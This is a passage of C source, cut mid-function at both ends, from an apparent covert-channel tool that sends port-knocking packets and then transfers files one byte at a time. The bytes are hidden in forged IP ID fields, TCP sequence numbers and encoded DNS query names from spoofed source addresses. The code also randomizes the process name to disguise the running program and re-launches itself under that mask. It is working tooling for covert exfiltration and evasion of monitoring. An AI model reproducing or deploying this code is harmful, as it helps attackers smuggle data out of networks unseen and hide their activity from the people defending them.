        iresult = fko_get_spa_data(get_pkcontext(), &spa_packet);
        if (iresult != FKO_SUCCESS) {
            sprintf(logmsg, "unable to prepare port knocking message packet %s [%s]",
                    spa_temp, fko_errstr(iresult));
            logit(_LOG_ERROR, logmsg, 0);
            return;
        }
        //
        // now put into packet and send to server
        //
        int using_fwknop_raw = TRUE;
        int using_hping_raw = FALSE;
        int should_send_len = 0;
        if (get_usetcp()) {
            should_send_len = (sizeof(struct iphdr) + sizeof(struct tcphdr) + strlen(spa_packet));
        } else if (get_useudp()) {
            should_send_len = (sizeof(struct iphdr) + sizeof(struct udphdr) + strlen(spa_packet));
        }
        remote.sin_port = htons(get_packetdestport());
        local.sin_port = htons(get_packetsrcport());
        if (get_useraw() && using_fwknop_raw) {
            iresult = send_spa_packet_raw_inviz(spa_packet,
                    strlen(spa_packet),
                    (struct sockaddr_in *)&local,
                    (struct sockaddr_in *)&remote,
                    get_sockraw());
        } else if (get_useraw() && using_hping_raw && get_useudp()) {
            data_size = strlen(spa_packet);
            memset(datapayload, 0, sizeof(datapayload));
            memcpy(datapayload, spa_packet, data_size);
            sockraw = get_sockraw();
            dst_port = get_packetdestport();
            if(get_srcport() == 0) {
                src_port = (((rand() % ((int)MAX_UNPRIVILEGED_PORT - (int)MAX_PRIVILEGED_PORT)) + (int)MAX_PRIVILEGED_PORT));
            } else {
                src_port = get_srcport();
            }
            send_udp();
            iresult = should_send_len; // assumed - not returned by hping's send_udp()
        } else {
            should_send_len = strlen(spa_packet); // headers not counted if not "raw"
            iresult = send_spa_packet_tcp_or_udp_inviz(spa_packet,
                strlen(spa_packet),
                targetname,
                (struct sockaddr*)&remote,
                0);
        }
        if (iresult <= 0) {
            sprintf(logmsg, "unable to send message packet %s", spa_temp);
            logit(_LOG_ERROR, logmsg, 0);
        } else if (iresult != should_send_len) {
            sprintf(logmsg, "unable to send complete message packet %s (%i of %i bytes sent)",
                    spa_temp,
                    iresult,
                    should_send_len);
            logit(_LOG_ERROR, logmsg, 0);
        } else {
            sprintf(logmsg, "port knocking message packet (%s) sent to %s:%i via %s",
                    spa_temp,
                    targetname,
                    get_packetdestport(),
                    (char *)get_protocoldesc());
            logit(_LOG_INFO, logmsg, 0);
            if (get_verbose()) {
                sprintf(logmsg, "port knocking message packet sent %sfrom %s:%i with digest %s",
                        spoofed_or_not,
                        sourcename,
                        get_packetsrcport(),
                        (char *)get_pkdigestdesc(get_pkdigest()));
                logit(_LOG_INFO, logmsg, 0);
            }
            if (get_pktype() == INVIZ_PKTYPE_PASS) {
                //
                // new password sent to listener/server is new password
                //
                set_pkpassword(get_pkpasscommand(), strlen(get_pkpasscommand()));
            } else if (get_pktype() == INVIZ_PKTYPE_TRANSFER) {
                //
                // now wait to receive file transfer packets
                // acting as listener/server side from here on
                //
                set_mode(INVIZ_MODE_SENDER_LISTENING);
                if (set_pklistener_defaults() != EXIT_SUCCESS) {
                    return;
                }
                fw_config_init_inviz();
                fw_initialize_inviz();
                set_filename(INVIZ_DEFAULT_RECEIVE_FILE, strlen(INVIZ_DEFAULT_RECEIVE_FILE));
                set_replace(TRUE); // should be in transfer options
                set_ipackets(0);
                while (!sig_interrupted) {
                    iresult = pcap_capture_inviz(FALSE);
                }
                set_mode(INVIZ_MODE_SENDER);
                //
            } else if ((get_pktype() == INVIZ_PKTYPE_INOTIFY) && get_inotifylog() && get_inotifyecho()) {
                //
                // server will be sending back log file - wait for it !
                //
                char filename_parm[MAX_FILENAME_LEN+6];
                memset(filename_parm, 0x0, sizeof(filename_parm));
                sprintf(filename_parm, "-Fa=%s", INVIZ_DEFAULT_PKINOTIFY_CLIENT_LOG_COPY);
                //
                char echodns_parm[MAX_IP6_LEN+4];
                memset(echodns_parm, 0x0, sizeof(echodns_parm));
                sprintf(echodns_parm, "-B=%s", get_inotifyechodns());
                //
                char echokey_parm[INVIZ_MAX_KEYSEED_LEN+4+strlen(INVIZ_KEY_DESC)];
                memset(echokey_parm, 0x0, sizeof(echokey_parm));
                sprintf(echokey_parm, "--"INVIZ_KEY_DESC"=%s", get_inotifyechokey());
                //
                char echoseed_parm[INVIZ_MAX_SEED_LEN+4+strlen(INVIZ_SEED_DESC)];
                memset(echoseed_parm, 0x0, sizeof(echoseed_parm));
                sprintf(echoseed_parm, "--"INVIZ_SEED_DESC"=%d", get_inotifyechoseed());
                //
                char verbose_parm[strlen(get_quietparm())+1];
                memset(verbose_parm, 0x0, sizeof(verbose_parm));
                if (get_verbose()) {
                    sprintf(verbose_parm, "%s", get_verboseparm());
                } else {
                    sprintf(verbose_parm, "%s", get_quietparm());
                }
                //
                char pkprivate_parm[strlen(get_pknotprivateparm())+1];
                memset(pkprivate_parm, 0x0, sizeof(pkprivate_parm));
                if (get_pkprivatesubnet()) {
                    sprintf(pkprivate_parm, "%s", get_pkprivateparm());
                } else {
                    sprintf(pkprivate_parm, "%s", get_pknotprivateparm());
                }
                //
                char log_parm[strlen(get_uselogfileparm())+1];
                memset(log_parm, 0x0, sizeof(log_parm));
                if (get_uselogfile()) {
                    sprintf(log_parm, "%s", get_uselogfileparm());
                } else {
                    sprintf(log_parm, "%s", get_nologfileparm());
                }
                //
                char pwd_parm[strlen(get_pkpasswordparm()) + strlen(get_pkpassword()) + 1];
                memset(pwd_parm, 0x0, sizeof(pwd_parm));
                sprintf(pwd_parm, "%s%s", get_pkpasswordparm(), get_pkpassword());
                //
                char if_parm[strlen(get_ifnameparm()) + strlen(get_ifname()) + 1];
                memset(if_parm, 0x0, sizeof(if_parm));
                sprintf(if_parm, "%s%s", get_ifnameparm(), get_ifname());
                //
                char pname[MAX_FILENAME_LEN+1];
                memset(pname, 0x0, sizeof(pname));
                strncpy(pname, get_programname(), MAX_FILENAME_LEN);
                //
                char psname[INVIZ_MAX_PSMASK_LEN+1];
                memset(psname, 0x0, sizeof(psname));
                strncpy(psname, get_originalpsname(), INVIZ_MAX_PSMASK_LEN);
                //
                // also --sleepmax= (or -X=)
                // if --wipe then will not work here because program is gone
                //
                int parentpid = getppid();
                if (get_verbose()) {
                    sprintf(logmsg, "parent pid is %d", parentpid);
                    logit(_LOG_INFO, logmsg, 0);
                }
                cleanup_parms();
                //
                // try to exec()
                // will replace current process
                //
                sprintf(logmsg, "now will re-launch to receive inotify log (%s) file",
                    filename_parm);
                logit(_LOG_INFO, logmsg, 0);
                int ires = execlp(pname,
                        psname,
                        filename_parm,
                        echodns_parm,
                        echokey_parm,
                        echoseed_parm,
                        pkprivate_parm,
                        pwd_parm,
                        if_parm,
                        log_parm,
                        verbose_parm,
                        NULL);
                if (ires < 0) {
                    sprintf(logmsg, "unable to exec() unexpected error %d [%s]",
                            errno,
                            strerror(errno));
                    logit(_LOG_ERROR, logmsg, 0);
                }
            }
        }
        //
        // now relaunch !
        //
        char pname[MAX_FILENAME_LEN+1];
        memset(pname, 0x0, sizeof(pname));
        strncpy(pname, get_programname(), MAX_FILENAME_LEN);
        //
        char psname[INVIZ_MAX_PSMASK_LEN+1];
        memset(psname, 0x0, sizeof(psname));
        strncpy(psname, get_originalpsname(), INVIZ_MAX_PSMASK_LEN);
        //
        char verbose_parm[strlen(get_quietparm())+1];
        memset(verbose_parm, 0x0, sizeof(verbose_parm));
        if (get_verbose()) {
            sprintf(verbose_parm, "%s", get_verboseparm());
        } else {
            sprintf(verbose_parm, "%s", get_quietparm());
        }
        //
        char pkprivate_parm[strlen(get_pknotprivateparm())+1];
        memset(pkprivate_parm, 0x0, sizeof(pkprivate_parm));
        if (get_pkprivatesubnet()) {
            sprintf(pkprivate_parm, "%s", get_pkprivateparm());
        } else {
            sprintf(pkprivate_parm, "%s", get_pknotprivateparm());
        }
        //
        char log_parm[strlen(get_uselogfileparm())+1];
        memset(log_parm, 0x0, sizeof(log_parm));
        if (get_uselogfile()) {
            sprintf(log_parm, "%s", get_uselogfileparm());
        } else {
            sprintf(log_parm, "%s", get_nologfileparm());
        }
        //
        int ilen = strlen(get_pkpasswordparm());
        if (get_pkpassword()) {
            ilen += strlen(get_pkpassword());
        } else if (strlen(get_noopparm()) > ilen) {
            ilen = strlen(get_noopparm());
        }
        char pwd_parm[ilen + 1];
        memset(pwd_parm, 0x0, sizeof(pwd_parm));
        if (get_pkpassword()) {
            sprintf(pwd_parm, "%s%s", get_pkpasswordparm(), get_pkpassword());
        } else {
            sprintf(pwd_parm, "%s", get_noopparm());
        }
        //
        char if_parm[strlen(get_ifnameparm()) + strlen(get_ifname()) + 1];
        memset(if_parm, 0x0, sizeof(if_parm));
        sprintf(if_parm, "%s%s", get_ifnameparm(), get_ifname());
        //
        cleanup_parms();
        //
        sprintf(logmsg, "now will re-launch to listen for incoming port knocking messages");
        logit(_LOG_INFO, logmsg, 0);
        int ires = execlp(pname,
            psname,
            "--pk="INVIZ_ANY_DESC,
            "--"INVIZ_LOG_DESC,
            verbose_parm,
            log_parm,
            pkprivate_parm,
            if_parm,
            pwd_parm,
            NULL);
        if (ires < 0) {
            sprintf(logmsg, "unable to exec() unexpected error %d [%s]",
                errno,
                strerror(errno));
            logit(_LOG_ERROR, logmsg, 0);
        }
        return;
    } else if (isclient && isfiletransfer) {
        //
        // delaytable from hping is not being used
        //
        for (c = 0; c < TABLESIZE; c++) {
            delaytable[c].seq = -1;
        }
        if (get_useudp()) {
            // initialize first "seed" number
            set_irotatingseed(get_iseed());
            send_udp_packet.nextlookuphost = malloc(NI_MAXHOST);
            if (send_udp_packet.nextlookuphost == NULL) {
                sprintf(logmsg, "unable to malloc send_udp_packet.nextlookuphost [%s]",
                        strerror(errno));
                logit(_LOG_ERROR, logmsg, 0);
                return;
            }
        }
        set_pfile( fopen(filename, "rb") ); // read, binary
        if (get_pfile() == NULL ) {
            sprintf(logmsg, "unable to open file (%s) for reading [%s]",
                    filename,
                    strerror(errno));
            logit(_LOG_ERROR, logmsg, 0);
            return;
        }
        //
        //
        //
        long lfilesize = get_filesize();
        int trigger_sent = FALSE;
        int eof_trigger_sent = FALSE;
        while( (ch=fgetc( get_pfile() )) != EOF ) {
            //
            /* Delay loop. This really slows things down, but is necessary to ensure */
            /* semi-reliable transport of messages over the Internet and will not flood */
            /* slow network connections */
            // pause for random number of seconds between sleep_min and sleep_max
            //
            set_char_to_hex(&ch, (char *)ch_hex, sizeof(char), TRUE);
            sleep_seconds = (rand() % (get_sleepmax() - get_minsleepmax())) + get_minsleepmax();
            if (sleep_seconds > 0) {
                sleep( sleep_seconds );
                if (get_randomizepsmask() && (INVIZ_PSMASK_TIMER > 0)) {
                    gettimeofday(&tprun, NULL);
                    time_snapshot = tprun.tv_sec+(tprun.tv_usec/1000000.0);
                    if ((time_snapshot - get_randomizepstimer()) >= (double)INVIZ_PSMASK_TIMER) {
                        // reset random process mask
                        set_randompsmask();
                        if (get_verbose()) {
                            sprintf(logmsg, "invizible process %i now masked as %s",
                                    (int)getpid(),
                                    (char *)get_psmask());
                            logit(_LOG_INFO, logmsg, 0);
                        }
                    }
                }
            }
            setflags[0] = '\0'; // reset each time
            if (opt_rawipmode) {
                strcat(setflags, "raw IP mode");
                hdr_size = IPHDR_SIZE;
            } else if (opt_icmpmode) {
                strcat(setflags, "icmp mode");
                hdr_size = IPHDR_SIZE + ICMPHDR_SIZE;
            } else if (opt_udpmode) {
                strcat(setflags, "udp mode");
                hdr_size = IPHDR_SIZE + UDPHDR_SIZE;
            } else {
                if (tcp_th_flags & TH_RST) {
                    strcat(setflags, "R");
                }
                if (tcp_th_flags & TH_SYN) {
                    strcat(setflags, "S");
                }
                if (tcp_th_flags & TH_ACK) {
                    strcat(setflags, "A");
                }
                if (tcp_th_flags & TH_FIN) {
                    strcat(setflags, "F");
                }
                if (tcp_th_flags & TH_PUSH) {
                    strcat(setflags, "P");
                }
                if (tcp_th_flags & TH_URG) {
                    strcat(setflags, "U");
                }
                if (tcp_th_flags & TH_X) {
                    strcat(setflags, "X");
                }
                if (tcp_th_flags & TH_Y) {
                    strcat(setflags, "Y");
                }
                if (setflags[0] == '\0') {
                    strcat(setflags, "NO FLAGS are");
                }
                hdr_size = IPHDR_SIZE + TCPHDR_SIZE;
            }
            //printf("HPING %s (%s %s): %s set, %d headers + %d data bytes\n", targetname, ifname, targetstraddr, setflags, hdr_size, data_size);
            //
            /* NOTE: I am not using the proper byte order functions to initialize */
            /* some of these values (htons(), htonl(), etc.) and this will certainly */
            /* cause problems on other architectures. I didn't like doing a direct */
            /* translation of ASCII into the variables because this looked really */
            /* suspicious seeing packets with sequence numbers of 0-255 all the time */
            /* so I just read them in raw and let the function mangle them to fit its */
            /* needs... CHR */
            //
            /* Make the IP header with our forged information */
            if (get_useudp()) {
                send_udp_packet.ip.ihl = 5;
                send_udp_packet.ip.version = 4;
                send_udp_packet.ip.tos = 0;
                send_udp_packet.ip.tot_len = htons(40);
            } else {
                send_tcp_packet.ip.ihl = 5;
                send_tcp_packet.ip.version = 4;
                send_tcp_packet.ip.tos = 0;
                send_tcp_packet.ip.tot_len = htons(40);
            }
            //
            /* if we are NOT doing IP ID header encoding, randomize the value */
            /* of the IP identification field */
            //
            if (spoof_ipid == FALSE) {
                if (get_useudp()) {
                    send_udp_packet.ip.id = random() & 0xffff;
                } else {
                    send_tcp_packet.ip.id = (int)(255.0 * rand()/(RAND_MAX+1.0));
                }
            } else {
                //
                /* otherwise we "encode" it with our cheesy algorithm */
                //
                if (get_useudp()) {
                    send_udp_packet.ip.id = (int)lfilesize;
                } else {
                    send_tcp_packet.ip.id = ch;
                }
            }
            if (get_useudp()) {
                send_udp_packet.ip.frag_off = 0;
                send_udp_packet.ip.ttl = IP_TTL_DEFAULT;
                send_udp_packet.ip.protocol = IPPROTO_UDP;
                send_udp_packet.ip.check = 0;
                send_udp_packet.ip.saddr = source_addr; // spoofed
                send_udp_packet.ip.daddr = dest_addr;
            } else {
                send_tcp_packet.ip.frag_off = 0;
                send_tcp_packet.ip.ttl = IP_TTL_DEFAULT;
                send_tcp_packet.ip.protocol = IPPROTO_TCP;
                send_tcp_packet.ip.check = 0;
                send_tcp_packet.ip.saddr = source_addr; // spoofed
                send_tcp_packet.ip.daddr = dest_addr;
            }
            //
            /* begin forged TCP/UDP header */
            //
            if(get_srcport() == 0) {
                /* if the user didn't supply a source port, we make one */
                if (get_useudp()) {
                    //send_udp_packet.udp.source = 1+(int)(100000.0*rand()/(RAND_MAX+1.0));
                    if (trigger_sent == FALSE) {
                        //
                        // first trigger packet has file size in trans id
                        // so put ch here
                        //
                        send_udp_packet.udp.source = htons(MAX_UNPRIVILEGED_PORT - (int)ch);
                    } else {
                        send_udp_packet.udp.source =
                            htons(((rand() % ((int)MAX_UNPRIVILEGED_PORT - (int)MAX_PRIVILEGED_PORT)) + (int)MAX_PRIVILEGED_PORT));
                    }
                    initsport = src_port = ntohs(send_udp_packet.udp.source);
                } else {
                    send_tcp_packet.tcp.source = htons(1+(int)(10000.0*rand()/(RAND_MAX+1.0)));
                }
            } else {
                /* otherwise use the one given */
                if (get_useudp()) {
                    send_udp_packet.udp.source = htons(get_packetsrcport()); // source_port
                    initsport = src_port = ntohs(send_udp_packet.udp.source);
                } else {
                    send_tcp_packet.tcp.source = htons(get_packetsrcport()); // source_port
                }
            }
            //
            if (spoof_tcpseq == FALSE) {
                //
                /* if we are not encoding the value into the seq number */
                // applicable only for tcp
                //
                if (get_usetcp()) {
                    send_tcp_packet.tcp.seq = 1+(int)(10000.0*rand()/(RAND_MAX+1.0));
                }
            } else {
                //
                /* otherwise we'll hide the data using our cheesy algorithm one more time. */
                //
                if (get_usetcp()) {
                    send_tcp_packet.tcp.seq = ch;
                }
            }
            //
            /* forge destination port */
            //
            if (get_useudp()) {
                send_udp_packet.udp.dest = htons(get_packetdestport());
            } else {
                send_tcp_packet.tcp.dest = htons(get_packetdestport());
            }
            //
            /* the rest of the flags */
            /* NOTE: Other covert channels can use the following flags to encode data a BIT */
            /* at a time. A good example would be the use of the PSH flag setting to either */
            /* on or off and having the remote side decode the bytes accordingly... CHR */
            //
            if (get_useudp()) {
                send_udp_packet.udp.check = 0;
                int udp_data_len = 0;
                int isize = 0;
                memset(send_udp_packet.nextlookuphost, 0, (int)NI_MAXHOST);
                if (trigger_sent) {
                    strncpy(send_udp_packet.nextlookuphost,
                            get_lookuphost(get_irotatingseed() + (int)ch, hostname_extension),
                            (int)NI_MAXHOST);
                    if (strlen(hostname_extension) > 0) {
                        strcat(send_udp_packet.nextlookuphost, hostname_extension);
                    }
                    if (get_usetransid()) {
                        //
                        // should always increase
                        // to what maximum?!
                        //
                        send_udp_packet.dns.hdr.trans_id =
                            htons((int)ch + get_iseed() + get_prevtid());
                    } else {
                        send_udp_packet.dns.hdr.trans_id =
                            htons((int)get_irotatingseed() + get_iseedconstant() + get_iseedoverflow());
                    }
                    if (get_verbose() > 1) {
                        int tid = send_udp_packet.dns.hdr.trans_id;
                        int pcount = (get_ipackets() + 1);
                        sprintf(logmsg, "packet %d trans id: %d",
                                pcount,
                                ntohs(tid));
                        logit(_LOG_INFO, logmsg, 0);
                    }
                    set_prevtid( ntohs(send_udp_packet.dns.hdr.trans_id) );
                    //
                    validate_char = get_lookupchar(send_udp_packet.nextlookuphost, get_irotatingseed());
                    set_char_to_hex(&validate_char, (char *)validate_char_hex, sizeof(char), TRUE);
                    if (validate_char != ch) {
                        sprintf(logmsg, "char validation error: %s should be %s for %s",
                                (char *)validate_char_hex,
                                (char *)ch_hex,
                                send_udp_packet.nextlookuphost);
                        logit(_LOG_ERROR, logmsg, 0);
                        return;
                    }
                } else {
                    // first "trigger" dns query
                    // puts first ch character from file into trans_id of dns header
                    strncpy(send_udp_packet.nextlookuphost, (char *)get_triggerhostname(),
                            (int)NI_MAXHOST);
                    send_udp_packet.dns.hdr.trans_id =
                            htons((int)lfilesize + get_iseedconstant() + get_iseed());
                    set_firsttid( ntohs(send_udp_packet.dns.hdr.trans_id) );
                    set_prevtid(get_firsttid());
                    //
                    if ( ((long)(int)lfilesize * 1.0) != lfilesize ) {
                        sprintf(logmsg, "file %s size %0.lf too large to transfer",
                                filename, (double)lfilesize);
                        logit(_LOG_ERROR, logmsg, 0);
                        return;
                    }
                    if (get_verbose() > 1) {
                        sprintf(logmsg, "trigger packet %d trans id: %d",
                                (get_ipackets()+1),
                                get_firsttid());
                        logit(_LOG_INFO, logmsg, 0);
                    }
                    trigger_sent = TRUE;
                }
                inc_irotatingseed();
                udp_data_len += sizeof(send_udp_packet.dns.hdr.trans_id);
                send_udp_packet.dns.hdr.flags = htons((int)DNS_QUERY_NO_SEARCH);
                udp_data_len += sizeof(send_udp_packet.dns.hdr.flags);
                send_udp_packet.dns.hdr.questions = htons(1); // currently only supporting 1 per query
                udp_data_len += sizeof(send_udp_packet.dns.hdr.questions);
                send_udp_packet.dns.hdr.answers = 0;
                udp_data_len += sizeof(send_udp_packet.dns.hdr.answers);
                send_udp_packet.dns.hdr.authorities = 0;
                udp_data_len += sizeof(send_udp_packet.dns.hdr.authorities);
                send_udp_packet.dns.hdr.additionals = 0;
                udp_data_len += sizeof(send_udp_packet.dns.hdr.additionals);
                lhlen = strlen(send_udp_packet.nextlookuphost)+1; // include null terminator
                strncpy(send_udp_packet.dns.qry.query_hostname,
                    send_udp_packet.nextlookuphost,
                    (size_t)lhlen);
                //
                // now save this to datapayload for use in data_handler()
                // if opt_datafrompayload
                //
                memset(datapayload, 0, sizeof(datapayload));
                memcpy(datapayload, &send_udp_packet.dns, udp_data_len);
                char *dotpos;
                uint dotnum;
                char dotchar;
                for(c=0; c < lhlen; c++) {
                    char hchar = send_udp_packet.dns.qry.query_hostname[c];
                    if (c==0) {
                        // insert number of positions to next "dot" in hostname
                        // at beginning and in place of each "dot"
                        dotpos = strchr(send_udp_packet.dns.qry.query_hostname+c, '.');
                        if (dotpos != NULL) {
                            dotchar = dotpos-(send_udp_packet.dns.qry.query_hostname+c)+1;
                            datapayload[udp_data_len+c] = dotchar-1;
                            udp_data_len++;
                        } else {
                            // no dots in hostname!
                            dotchar = strlen(send_udp_packet.dns.qry.query_hostname+c);
                            datapayload[udp_data_len+c] = dotchar;
                            udp_data_len++;
                        }
                    } else if (hchar == '.') {
                        dotpos = strchr(send_udp_packet.dns.qry.query_hostname+c+1, '.');
                        dotnum = dotpos-(send_udp_packet.dns.qry.query_hostname+c+1);
                        if (dotpos != NULL) {
                            dotchar = dotpos-(send_udp_packet.dns.qry.query_hostname+c+1)+1;
                            datapayload[udp_data_len+c] = dotchar-1;
                        } else {
                            // no more dots in hostname!
                            dotchar = strlen(send_udp_packet.dns.qry.query_hostname+c+1);
                            datapayload[udp_data_len+c] = dotchar;
                        }
                        continue;
                    }
                    memcpy(datapayload+udp_data_len+c, &send_udp_packet.dns.qry.query_hostname[c], 1);
                }
                udp_data_len += lhlen;
                send_udp_packet.dns.qry.query_type = htons(DNS_TYPE_A);
                isize = sizeof(send_udp_packet.dns.qry.query_type);
                memcpy(datapayload+udp_data_len, &send_udp_packet.dns.qry.query_type, isize);
                udp_data_len += isize;
                send_udp_packet.dns.qry.query_class = htons(DNS_CLASS_INET);
                isize = sizeof(send_udp_packet.dns.qry.query_class);
                memcpy(datapayload+udp_data_len, &send_udp_packet.dns.qry.query_class, isize);
                udp_data_len += isize;
                send_udp_packet.udp.len = htons(UDP_HDR_LEN + udp_data_len);
            } else {
                send_tcp_packet.tcp.ack_seq = 0;
                send_tcp_packet.tcp.res1 = 0;
                send_tcp_packet.tcp.doff = 5;
                send_tcp_packet.tcp.fin = 0;
                send_tcp_packet.tcp.syn = 1;
                send_tcp_packet.tcp.rst = 0;
                send_tcp_packet.tcp.psh = 0;
                send_tcp_packet.tcp.ack = 0;
                send_tcp_packet.tcp.urg = 0;
                send_tcp_packet.tcp.res2 = 0;
                send_tcp_packet.tcp.window = htons(INVIZ_TCP_SYN_WINDOW_SIZE);
                send_tcp_packet.tcp.check = 0;
                send_tcp_packet.tcp.urg_ptr = 0;
            }
            //
            /* Drop our forged data into the socket struct */
            //
            if (get_useip4()) {
                sin.sin_family = AF_INET;
            } else if (get_useip6()) {
                sin.sin_family = AF_INET6;
            } else {
                sin.sin_family = AF_UNSPEC;
            }
            if (get_useudp()) {
                sin.sin_port = send_udp_packet.udp.source;
                sin.sin_addr.s_addr = send_udp_packet.ip.daddr;
            } else {
                sin.sin_port = send_tcp_packet.tcp.source;
                sin.sin_addr.s_addr = send_tcp_packet.ip.daddr;
            }
            if (get_useicmp()) {
                //
                // icmp source ip4
                //
                if (icmp_ip_srcip[0] == '\0') {
                    iresult = resolve_addr((struct sockaddr*)&icmp_ip_src, "1.2.3.4");
                } else {
                    iresult = resolve_addr((struct sockaddr*)&icmp_ip_src, icmp_ip_srcip);
                }
                if (iresult != 0) {
                    sprintf(logmsg, "unable to resolve icmp source address [%s]", strerror(errno));
                    logit(_LOG_ERROR, logmsg, 0);
                    return;
                }
                //
                // icmp destination ip4
                //
                if (icmp_ip_dstip[0] == '\0') {
                    iresult = resolve_addr((struct sockaddr*)&icmp_ip_dst, "5.6.7.8");
                } else {
                    iresult = resolve_addr((struct sockaddr*)&icmp_ip_dst, icmp_ip_dstip);
                }
                if (iresult != 0) {
                    sprintf(logmsg, "unable to resolve icmp destination address [%s]", strerror(errno));
                    logit(_LOG_ERROR, logmsg, 0);
                    return;
                }
                //
                // icmp gateway ip4
                //
                if (icmp_gwip[0] == '\0') {
                    iresult = resolve_addr((struct sockaddr*)&icmp_gw, "0.0.0.0");
                } else {
                    iresult = resolve_addr((struct sockaddr*)&icmp_gw, icmp_gwip);
                }
                if (iresult != 0) {
                    sprintf(logmsg, "unable to resolve icmp gw address [%s]", strerror(errno));
                    logit(_LOG_ERROR, logmsg, 0);
                    return;
                }
            }
            //
            /* Make IP header checksum */
            //
            if (get_useudp()) {
                send_udp_packet.ip.check = in_cksum( (unsigned short *)&send_udp_packet.ip, 20 );
            } else {
                send_tcp_packet.ip.check = in_cksum( (unsigned short *)&send_tcp_packet.ip, 20 );
            }
            //
            /* Final preparation of the full header */
            //
            /* From synhose.c by knight */
            //
            if (get_useudp()) {
                pseudo_header_udp.source_address = send_udp_packet.ip.saddr;
                pseudo_header_udp.dest_address = send_udp_packet.ip.daddr;
                pseudo_header_udp.placeholder = 0;
                pseudo_header_udp.protocol = IPPROTO_UDP;
                pseudo_header_udp.udp_length = htons(20);
                bcopy( (char *)&send_udp_packet.udp, (char *)&pseudo_header_udp.udp, 20 );
            } else {
                pseudo_header_tcp.source_address = send_tcp_packet.ip.saddr;
                pseudo_header_tcp.dest_address = send_tcp_packet.ip.daddr;
                pseudo_header_tcp.placeholder = 0;
                pseudo_header_tcp.protocol = IPPROTO_TCP;
                pseudo_header_tcp.tcp_length = htons(20);
                bcopy( (char *)&send_tcp_packet.tcp, (char *)&pseudo_header_tcp.tcp, 20 );
            }
            //
            /* Final checksum on the entire package */
            //
            if (get_useudp()) {
                send_udp_packet.udp.check = in_cksum( (unsigned short *)&pseudo_header_udp, 32 );
            } else {
                send_tcp_packet.tcp.check = in_cksum( (unsigned short *)&pseudo_header_tcp, 32 );
            }
            //
            /* Away we go.... */
            //
            confirmationexpired = FALSE;
            if (get_useudp()) {
                if (INVIZ_USING_HPING && INVIZ_USING_SIGNALS) { // not implementing this yet
                    //
                    /* use SIGALRM to send packets like ping */
                    //
                    //Signal(SIGALRM, send_packet);
                    //
                    /* binding */
                    //
                    //if (ctrlzbind != BIND_NONE) {
                    //    Signal(SIGTSTP, inc_destparm);
                    //}
                    //Signal(SIGINT, print_statistics);
                    //Signal(SIGTERM, print_statistics);
                    //
                    /* start packet sending */
                    //
                    //kill(getpid(), SIGALRM);
                } else if (INVIZ_USING_HPING) {
                    //
                    // save datapayload and other data to allow re-sending this packet!
                    // if confirmation fails
                    //
                    while (TRUE) {
                        data_size = ntohs(send_udp_packet.udp.len);
                        sockraw = get_sockraw();
                        int duplicate_count = get_duplicates();
                        int duplicate_sleep = get_iduplicateinterval();
                        while (TRUE) {
                            send_udp();
                            if (duplicate_count <= 0) {
                                break;
                            }
                            duplicate_count--;
                            if (duplicate_sleep) {
                                sleep(duplicate_sleep);
                            }
                        }
                        //
                        if (isbidirectional) {
                            //
                            // wait for confirmation of this packet?
                            // if confirmation interval = 0 then never wait
                            // if confirmation interval = 1 then wait for each packet sent
                            // if confirmation interval > 1 then wait every interval
                            // if confirmation expected but not received then do not send more
                            //
                            if (dec_iwatchdog() == 0) {
                                //
                                // now start the capture session
                                // for just 1 char/packet
                                //
                                sprintf(logmsg, "char %d of %d (%s) sent - now waiting for confirmation...",
                                        (int)(get_filedone()+sizeof(char)),
                                        (int)get_filesize(),
                                        ch_hex);
                                logit(_LOG_INFO, logmsg, 0);
                                gettimeofday(&tprun, NULL);
                                time_confirmstart = tprun.tv_sec+(tprun.tv_usec/1000000.0);
                                while (TRUE) {
                                    pcap_recv_buffer[0] = 0;
                                    pcap_recv_index = 0;
                                    //
                                    // reset rotating seed back to value at start of this sent packet
                                    // so confirmation packet sent from server can be de-constructed properly
                                    // re-increment after coming out of pcap_loop()
                                    //
                                    dec_irotatingseed();
                                    //
                                    // now wait for incoming confirmation packet from server
                                    //
                                    pcap_loop(get_pcapstruct(), 1, pcap_client_packet_callback, args);
                                    //
                                    // now exited from pcap listen loop
                                    //
                                    inc_irotatingseed();
                                    gettimeofday(&tprun, NULL);
                                    time_current = tprun.tv_sec+(tprun.tv_usec/1000000.0);
                                    confirmationexpired = ( (time_current - time_confirmstart) > get_iconfirmexpiry() );
                                    if (pcap_recv_index == 0) {
                                        // no recognized confirmation packet received
                                        if (confirmationexpired) {
                                            break;
                                        } else {
                                            continue;
                                        }
                                    }
                                    if (pcap_recv_buffer[0] == 0) {
                                        sprintf(logmsg, "still waiting for confirmation of char %d of %d...",
                                                (int)(get_filedone()+sizeof(char)),
                                                (int)get_filesize());
                                        logit(_LOG_INFO, logmsg, 0);
                                        if (confirmationexpired) {
                                            break;
                                        } else {
                                            continue; // keep waiting for confirmation
                                        }
                                    }
                                    if (pcap_recv_buffer[0] != (int)ch) {
                                        //
                                        // sent packet to server was not valid
                                        //
                                        set_int_to_hex(pcap_recv_buffer[0],
                                                (char *)recv_ch_hex,
                                                TRUE);
                                        sprintf(logmsg, "unable to verify char (%s) sent (received %s)",
                                            (char *)ch_hex,
                                            (char *)recv_ch_hex);
                                        logit(_LOG_WARNING, logmsg, 0);
                                        if (confirmationexpired) {
                                            break;
                                        } else {
                                            break; // try sending again
                                        }
                                    }
                                    break;
                                }
                                //
                                // do "continue" from here if confirmation failed
                                // but only after datapayload etc has been saved and can
                                // be reset here before "continue"
                                //
                                if (!confirmationexpired) {
                                    // now char is verified, so continue
                                    set_iwatchdog(get_iconfirminterval()); // reset watchdog counter
                                }
                            }
                        }
                        if (!get_started() && !confirmationexpired) {
                            set_started(TRUE);
                        }
                        break;
                    }
                } else {
                   sendto( get_sockraw(), &send_udp, 40, 0, (struct sockaddr *)&sin, sizeof(sin) );
                }
            } else {
                sendto( get_sockraw(), &send_tcp, 40, 0, (struct sockaddr *)&sin, sizeof(sin) );
                close(get_sockraw());
                set_sockraw(0);
            }
            if ( confirmationexpired && isbidirectional ) {
                sprintf(logmsg, "file %s not sent - confirmation not received after %d seconds",
                        filename,
                        get_iconfirmexpiry());
                logit(_LOG_ERROR, logmsg, 0);
                break;
            } else {
                set_filedonemore(sizeof(char)); // track this to potentially allow restart
                inc_ipackets(); // count sent packets
            }
            if (get_verbose() && !confirmationexpired) {
                double ddone = (100.0 * get_filedone() / (1.0 * get_filesize()));
                gettimeofday(&tprun, NULL);
                time_snapshot = tprun.tv_sec+(tprun.tv_usec/1000000.0);
                if ((int)ddone > 5) {
                    double dleft = (((time_snapshot - time_start) / (ddone / 100.0)) - (time_snapshot - time_start));
